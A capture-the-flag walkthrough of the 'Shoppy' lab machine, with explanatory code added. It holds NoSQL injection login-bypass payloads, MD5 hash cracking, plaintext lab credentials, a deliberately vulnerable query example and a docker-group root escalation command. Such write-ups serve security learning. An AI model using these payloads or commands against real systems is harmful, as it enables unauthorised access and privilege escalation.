Target IP: 10.129.227.233
Challenge Description: N/A.
Performing a TCP port scan using the command sudo nmap -sS 10.129.227.233 -p- returns the result shown above. By the looks of it, there are three TCP ports open on the target machine: SSH, HTTP, and another -- I assume -- HTTP application on the higher port. Time to identify the services with a version and script scan.
┌──(kali㉿kali)-[~/Desktop/Lab-Resource/Completed/Shoppy]
└─$ sudo nmap -sV -A 10.129.227.233 -p 22,80,9093
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-18 10:24 UTC
Nmap scan report for 10.129.227.233
Host is up (0.019s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 9e:5e:83:51:d9:9f:89:ea:47:1a:12:eb:81:f9:22:c0 (RSA)
| 256 58:57:ee:eb:06:50:03:7c:84:63:d7:a3:41:5b:1a:d5 (ECDSA)
|_ 256 3e:9d:0a:42:90:44:38:60:b3:b6:2c:e9:bd:9a:67:54 (ED25519)
80/tcp open http nginx 1.23.1
|_http-title: Did not follow redirect to http://shoppy.htb
|_http-server-header: nginx/1.23.1
9093/tcp open copycat?
| fingerprint-strings:
| GenericLines:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest, HTTPOptions:
| HTTP/1.0 200 OK
| Content-Type: text/plain; version=0.0.4; charset=utf-8
| Date: Sat, 18 May 2024 10:24:32 GMT
| HELP go_gc_cycles_automatic_gc_cycles_total Count of completed GC cycles generated by the Go runtime.
| TYPE go_gc_cycles_automatic_gc_cycles_total counter
| go_gc_cycles_automatic_gc_cycles_total 6
| HELP go_gc_cycles_forced_gc_cycles_total Count of completed GC cycles forced by the application.
| TYPE go_gc_cycles_forced_gc_cycles_total counter
| go_gc_cycles_forced_gc_cycles_total 0
| HELP go_gc_cycles_total_gc_cycles_total Count of all completed GC cycles.
| TYPE go_gc_cycles_total_gc_cycles_total counter
| go_gc_cycles_total_gc_cycles_total 6
| HELP go_gc_duration_seconds A summary of the pause duration of garbage collection cycles.
| TYPE go_gc_duration_seconds summary
| go_gc_duration_seconds{quantile="0"} 1.2103e-05
| go_gc_duration_seconds{quantile="0.25"} 4.769e-05
|_ go_gc_dura
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9093-TCP:V=7.94%I=7%D=5/18%Time=664881DF%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(GetRequest,2A60,"HTTP/1\.0\x20200\x20OK\r\nContent-Type:\
SF:x20text/plain;\x20version=0\.0\.4;\x20charset=utf-8\r\nDate:\x20Sat,\x2
SF:018\x20May\x202024\x2010:24:32\x20GMT\r\n\r\n#\x20HELP\x20go_gc_cycles_
SF:automatic_gc_cycles_total\x20Count\x20of\x20completed\x20GC\x20cycles\x
SF:20generated\x20by\x20the\x20Go\x20runtime\.\n#\x20TYPE\x20go_gc_cycles_
SF:automatic_gc_cycles_total\x20counter\ngo_gc_cycles_automatic_gc_cycles_
SF:total\x206\n#\x20HELP\x20go_gc_cycles_forced_gc_cycles_total\x20Count\x
SF:20of\x20completed\x20GC\x20cycles\x20forced\x20by\x20the\x20application
SF:\.\n#\x20TYPE\x20go_gc_cycles_forced_gc_cycles_total\x20counter\ngo_gc_
SF:cycles_forced_gc_cycles_total\x200\n#\x20HELP\x20go_gc_cycles_total_gc_
SF:cycles_total\x20Count\x20of\x20all\x20completed\x20GC\x20cycles\.\n#\x2
SF:0TYPE\x20go_gc_cycles_total_gc_cycles_total\x20counter\ngo_gc_cycles_to
SF:tal_gc_cycles_total\x206\n#\x20HELP\x20go_gc_duration_seconds\x20A\x20s
SF:ummary\x20of\x20the\x20pause\x20duration\x20of\x20garbage\x20collection
SF:\x20cycles\.\n#\x20TYPE\x20go_gc_duration_seconds\x20summary\ngo_gc_dur
SF:ation_seconds{quantile=\"0\"}\x201\.2103e-05\ngo_gc_duration_seconds{qu
SF:antile=\"0\.25\"}\x204\.769e-05\ngo_gc_dura")%r(HTTPOptions,4B1E,"HTTP/
SF:1\.0\x20200\x20OK\r\nContent-Type:\x20text/plain;\x20version=0\.0\.4;\x
SF:20charset=utf-8\r\nDate:\x20Sat,\x2018\x20May\x202024\x2010:24:32\x20GM
SF:T\r\n\r\n#\x20HELP\x20go_gc_cycles_automatic_gc_cycles_total\x20Count\x
SF:20of\x20completed\x20GC\x20cycles\x20generated\x20by\x20the\x20Go\x20ru
SF:ntime\.\n#\x20TYPE\x20go_gc_cycles_automatic_gc_cycles_total\x20counter
SF:\ngo_gc_cycles_automatic_gc_cycles_total\x206\n#\x20HELP\x20go_gc_cycle
SF:s_forced_gc_cycles_total\x20Count\x20of\x20completed\x20GC\x20cycles\x2
SF:0forced\x20by\x20the\x20application\.\n#\x20TYPE\x20go_gc_cycles_forced
SF:_gc_cycles_total\x20counter\ngo_gc_cycles_forced_gc_cycles_total\x200\n
SF:#\x20HELP\x20go_gc_cycles_total_gc_cycles_total\x20Count\x20of\x20all\x
SF:20completed\x20GC\x20cycles\.\n#\x20TYPE\x20go_gc_cycles_total_gc_cycle
SF:s_total\x20counter\ngo_gc_cycles_total_gc_cycles_total\x206\n#\x20HELP\
SF:x20go_gc_duration_seconds\x20A\x20summary\x20of\x20the\x20pause\x20dura
SF:tion\x20of\x20garbage\x20collection\x20cycles\.\n#\x20TYPE\x20go_gc_dur
SF:ation_seconds\x20summary\ngo_gc_duration_seconds{quantile=\"0\"}\x201\.
SF:2103e-05\ngo_gc_duration_seconds{quantile=\"0\.25\"}\x204\.769e-05\ngo_
SF:gc_dura");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (96%), Linux 5.0 - 5.5 (96%), Linux 4.15 - 5.8 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), Linux 2.6.32 (94%), Linux 5.3 - 5.4 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 9093/tcp)
HOP RTT ADDRESS
1 18.70 ms 10.10.14.1
2 19.42 ms 10.129.227.233
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.02 seconds

Executing the command sudo nmap -sV -A 10.129.227.233 -p 22,80,9093 returns the result shown above. I notice the HTTP service on port 80 redirects to shoppy.htb, so I will need to add this hostname to my /etc/hosts file. The service on the higher port 9093 is more informative than nmap's copycat? guess suggests: the Content-Type text/plain; version=0.0.4 and the go_* metric names are the Prometheus text exposition format, so this is a Go application exposing its runtime metrics over HTTP. I will perform a subdomain enumeration before enumerating the web applications themselves.
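A small parser for the format port 9093 returned, as an added example that is not part of the original write-up. The sample body is reconstructed from the metric lines visible in the nmap output above (with the leading "# " markers that the raw fingerprint string shows); the parser itself follows the Prometheus text exposition format, which is what Content-Type text/plain; version=0.0.4 announces.

```javascript
// Added example (not part of the original write-up): a small parser for the
// Prometheus text exposition format that port 9093 served. The Content-Type
// "text/plain; version=0.0.4" is that format's identifier, and go_* metrics
// come from the Go runtime collectors, so the "copycat?" guess is really a Go
// service exposing its metrics.

// Sample reconstructed from the lines in the nmap output above.
const SAMPLE_METRICS = [
  '# HELP go_gc_cycles_automatic_gc_cycles_total Count of completed GC cycles generated by the Go runtime.',
  '# TYPE go_gc_cycles_automatic_gc_cycles_total counter',
  'go_gc_cycles_automatic_gc_cycles_total 6',
  '# HELP go_gc_cycles_forced_gc_cycles_total Count of completed GC cycles forced by the application.',
  '# TYPE go_gc_cycles_forced_gc_cycles_total counter',
  'go_gc_cycles_forced_gc_cycles_total 0',
  '# HELP go_gc_duration_seconds A summary of the pause duration of garbage collection cycles.',
  '# TYPE go_gc_duration_seconds summary',
  'go_gc_duration_seconds{quantile="0"} 1.2103e-05',
  'go_gc_duration_seconds{quantile="0.25"} 4.769e-05',
].join('\n');

// <name>{label="value",...} <value> [timestamp]; labels and timestamp are optional.
const SAMPLE_RE = /^([A-Za-z_:][A-Za-z0-9_:]*)(?:\{([^}]*)\})?\s+(\S+)/;
const LABEL_RE = /([A-Za-z_][A-Za-z0-9_]*)="((?:[^"\\]|\\.)*)"/g;

function parseLabels(raw) {
  const labels = {};
  if (!raw) return labels;
  for (const m of raw.matchAll(LABEL_RE)) {
    // Undo the three escapes the format allows inside label values: \" \\ \n
    labels[m[1]] = m[2].replace(/\\(["\\n])/g, (_, c) => (c === 'n' ? '\n' : c));
  }
  return labels;
}

function parseExposition(text) {
  const families = {}; // name -> { type, help, samples: [{ labels, value }] }
  const family = (name) => (families[name] || (families[name] = { type: null, help: null, samples: [] }));
  for (const rawLine of text.split('\n')) {
    const line = rawLine.trim();
    if (line === '') continue;
    let m;
    if ((m = line.match(/^# HELP (\S+) ?(.*)$/))) {
      family(m[1]).help = m[2];
    } else if ((m = line.match(/^# TYPE (\S+) (\S+)$/))) {
      family(m[1]).type = m[2];
    } else if (line.startsWith('#')) {
      continue; // ordinary comment
    } else if ((m = line.match(SAMPLE_RE))) {
      // _sum/_count/_bucket samples belong to their summary or histogram family.
      const base = m[1].replace(/_(sum|count|bucket)$/, '');
      const parent = families[base];
      const target = parent && (parent.type === 'summary' || parent.type === 'histogram') ? base : m[1];
      family(target).samples.push({ labels: parseLabels(m[2]), value: Number(m[3]) });
    } else {
      throw new Error(`unparseable line: ${line}`);
    }
  }
  return families;
}

// Metric-name prefixes alone say a lot about what is running: Go runtime,
// process, HTTP handler and application-specific collectors each have their own.
function metricPrefixes(families) {
  const counts = {};
  for (const name of Object.keys(families)) {
    const prefix = name.split('_')[0];
    counts[prefix] = (counts[prefix] || 0) + 1;
  }
  return counts;
}
```

Pointed at a live endpoint, the interesting families are the non-runtime ones: build-info and version labels, hostnames, and per-route request counters that reveal endpoints without any directory brute force.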
I performed subdomain (virtual host) enumeration using the command ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/combined_subdomains.txt -H "Host: FUZZ.shoppy.htb" -u http://shoppy.htb -fw 5 and got a hit, as shown above. The -fw 5 filter hides responses with the word count of the catch-all virtual host, so only a hostname that serves different content shows up. I used multiple wordlists before obtaining a hit. I will now add the hostname mattermost.shoppy.htb to my /etc/hosts file too.
Now my /etc/hosts contains the entry 10.129.227.233 mattermost.shoppy.htb shoppy.htb, as shown above. Time to enumerate.
Port 80: HTTP
The webpage above is displayed for this web application. I scanned the source code of this webpage, but I did not find anything useful.
I used the command gobuster dir -u http://shoppy.htb -w /usr/share/wordlists/dirb/big.txt -x html,php,txt to perform a directory search and obtained the result shown above. There are interesting entries such as /login. Time to check this out.
The webpage above is displayed for the /login page. Maybe I can log in with default credentials? I tried admin:admin and admin:root, but I had no luck. Since this is a login page, maybe it is vulnerable to injection attacks? I tried SQL injection payloads, but I had no luck: all I got back was a 504 Gateway Time-out, which means nginx gave up waiting on the backend application. Input that makes the backend hang instead of returning a clean error can still be a sign that it reaches a query.
After browsing for NoSQL injection payloads, I managed to find the payload admin'||'1'='1'. I inserted this payload in the username field, sent the request and got a hit, as shown above. The single quote closes the string the application wraps around the username and the || appends a condition that holds for every record, so the web application is vulnerable to NoSQL injection. I now have access to the web application. Right away, I notice it is possible to search for users.
I searched for the username admin and got a hit as shown above. I notice there is another button called Download export after searching for the user admin. Pressing the button returned the webpage shown below.
I managed to obtain the username and password hash of the user admin. However, there could be other users.
To list all the users on this web application, I used a variant of the payload, admin'||'1==1, in the search field and obtained the result shown above. There are two users: admin and josh. Time to crack the password hashes. I copied both hashes to a file called hash on my machine and ran john on them.
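How the payload works, as an added example that is not part of the original write-up or the Shoppy application's code. It assumes the user search is built by splicing the username into a MongoDB $where expression (a common shape for this bug; the page does not show the real query), emulates MongoDB's per-document JavaScript evaluation in-process so it runs offline, and puts the safe query next to the vulnerable one. The payload used is admin'||'1==1, the variant from the user search above.

```javascript
// Added example (not the Shoppy application's code): why a payload like
// admin'||'1==1 matches every user when the username is spliced into a MongoDB
// $where expression, and the query shape that is immune to it. The vulnerable
// query construction is an assumption about how such a bug arises; the real
// application's query is not shown on the page.

// Constructed sample collection; the hash values are placeholders.
const users = [
  { username: 'admin', password: '<admin-hash>' },
  { username: 'josh', password: '<josh-hash>' },
];

// Stand-in for MongoDB's server-side $where: the string is compiled to JS and
// evaluated once per document with `this` bound to that document.
function findWhere(collection, whereExpr) {
  const predicate = new Function(`return (${whereExpr});`);
  return collection.filter((doc) => Boolean(predicate.call(doc)));
}

// The expression a string-built query ends up sending to the database.
function renderWhere(username) {
  return `this.username == '${username}'`;
}

// VULNERABLE: the search term becomes part of the expression's source code.
// With admin'||'1==1 the quote closes the literal and the || makes the
// expression truthy for every document.
function searchUsersVulnerable(collection, username) {
  return findWhere(collection, renderWhere(username));
}

// SAFE: compare against a value, never against code, and refuse anything that
// is not a string so operator injection from a JSON body
// ({"username": {"$ne": ""}}) is impossible too. Libraries such as
// mongo-sanitize attack the same problem by stripping $-prefixed keys.
function searchUsersSafe(collection, username) {
  if (typeof username !== 'string') {
    throw new TypeError('username must be a string');
  }
  return collection.filter((doc) => doc.username === username);
}
```

The two defences are independent: the type check stops operator injection through JSON bodies, and passing the username as a value rather than as code stops the string-breakout shown here. An application needs both.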
The password hashes look like unsalted MD5 (32 hexadecimal characters). I used the command john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5 and cracked one of the two hashes, obtaining the password remembermethisway, as shown above. This password belongs to the user josh. I tried to SSH into the target machine with these credentials, but I had no luck. Time to enumerate the other web application over at mattermost.shoppy.htb.
Port 80: HTTP (mattermost.shoppy.htb)
The webpage above is displayed for this web application. I tried default credentials such as admin:admin, but I had no luck. Time to try the credentials josh:remembermethisway instead.
And bingo! Now I have access to the web application as the user josh, as shown above. After some manual enumeration, I found three users on this web application: josh, jaeger, and jess. The application identifies itself as Mattermost Version 7.1.2. I searched on Google for vulnerabilities in this version and found some interesting results. Time to enumerate further.
I notice there is a channel called Deploy Machine on the web application. This channel contains the credentials jaeger:Sh0ppyBest@pp!, as shown above. I tried these credentials against this same web application, but I had no luck, so I tested them against SSH instead.
And now I have an SSH shell on the target machine as the user jaeger with the password Sh0ppyBest@pp!, as shown above. Passwords pasted into a chat channel are a classic source of lateral movement; this one gave me a foothold on the target machine :)
Running the command sudo -l shows the user jaeger can execute the binary /home/deploy/password-manager as the user deploy, as shown above.
I checked the contents of the directory /home/deploy and obtained the result shown above. There are interesting files in this directory, but I have very little access to them: I tried to read the source code in password-manager.cpp, but I do not have permission. The binary itself is readable, however, and strings is available on the target machine.
Running the command strings password-manager, I checked for any useful strings in the binary and obtained the result shown above, but I was unable to locate the password. The application is made by the user josh and asks for a master password. I tried the two passwords I obtained previously, but I had no luck. The default strings scan only reports runs of single-byte printable characters, so a password stored as a wide (16-bit) string would not appear in it. I can run Ghidra on the binary, but I can also try the other character encodings strings offers through its -e flag.
I executed the command strings -eb password-manager, which scans for 16-bit big-endian characters, and obtained the string Sample, as shown above. Is this the hidden password?
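What strings -e actually scans for, as an added example that is not part of the original write-up. GNU strings selects the character encoding with -e: s = single 7-bit byte (the default), S = single 8-bit byte, b = 16-bit big-endian, l = 16-bit little-endian, B and L for 32-bit. The function below re-implements the scan for s, b and l, and the byte buffer it runs over is constructed for the demonstration; it is not the real password-manager binary.

```javascript
// Added example (not from the original write-up): a re-implementation of the
// scan `strings -e <enc>` performs, to show why a wide-character string is
// invisible to a plain `strings` run but surfaces with -eb. The buffer is
// constructed; it is not the real binary.

// A printable 7-bit character, which is all this scan accepts (ASCII only, no locale).
const isPrintable = (c) => c >= 0x20 && c <= 0x7e;

// Character width and byte order for the encodings handled here:
// s = single 7-bit byte (default), b = 16-bit big-endian, l = 16-bit little-endian.
const ENCODINGS = {
  s: { width: 1, bigEndian: true },
  b: { width: 2, bigEndian: true },
  l: { width: 2, bigEndian: false },
};

// Return every run of at least minLen printable characters in the given
// encoding, the way `strings -n <minLen> -e <enc>` would.
function extractStrings(buf, encoding = 's', minLen = 4) {
  const enc = ENCODINGS[encoding];
  if (!enc) throw new Error(`unsupported encoding: ${encoding}`);
  const readChar = (i) => {
    let v = 0;
    for (let k = 0; k < enc.width; k++) {
      v = enc.bigEndian ? (v << 8) | buf[i + k] : v | (buf[i + k] << (8 * k));
    }
    return v;
  };
  const found = [];
  let run = '';
  let i = 0;
  while (i + enc.width <= buf.length) {
    const ch = readChar(i);
    if (isPrintable(ch)) {
      run += String.fromCharCode(ch);
      i += enc.width; // stay on this alignment while the run continues
    } else {
      if (run.length >= minLen) found.push(run);
      run = '';
      i += 1; // like GNU strings, resume at every byte offset
    }
  }
  if (run.length >= minLen) found.push(run);
  return found;
}

// Constructed "binary": a few header-like bytes, one ordinary C string, and a
// wide (UTF-16BE) string that the default scan cannot see.
const utf16be = (s) => Array.from(s, (c) => [0x00, c.charCodeAt(0)]).flat();
const asciiBytes = (s) => Array.from(s, (c) => c.charCodeAt(0));
const SAMPLE_BINARY = Uint8Array.from([
  0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00,
  ...asciiBytes('Enter master password:'), 0x00,
  0x00, 0x00, 0x01, 0x02,
  ...utf16be('Sample'), 0x00, 0x00,
  0xde, 0xad, 0xbe, 0xef,
]);
```

Because the scanner restarts at every byte offset, a 16-bit string is found by both -eb and -el (the little-endian pass simply lands on the shifted alignment); the two differ in which byte of each pair is treated as the character. Short secrets still need a lower -n, since the default minimum of 4 drops anything shorter.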
I ran the command sudo -u deploy /home/deploy/password-manager, entered Sample as the master password, and it was accepted, as shown above. The string Sample is indeed the master password for this password-manager application, and it hands me the credentials deploy:Deploying@pp!, as shown above.
Using the command su deploy and the password Deploying@pp!, I elevated my privileges to the user deploy, as shown above. Running the command id shows the interesting group docker. Membership in the docker group is effectively root: anyone who can talk to the Docker daemon can start a container that mounts the host filesystem, and the daemon itself runs as root. To identify which docker image is present, I used the command docker images and saw an alpine image. Obtaining a root shell is simple.
To obtain a root shell as the user deploy, I executed the command docker run -v /:/mnt --rm -it alpine chroot /mnt sh, as shown above. The -v /:/mnt option bind-mounts the host's root filesystem into the container and chroot /mnt sh drops a shell into it, so the shell runs as root against the host's files (the container's root is the host's root unless user namespace remapping is enabled). Now I have a root shell on the target machine :) GG.
The two flags are shown above.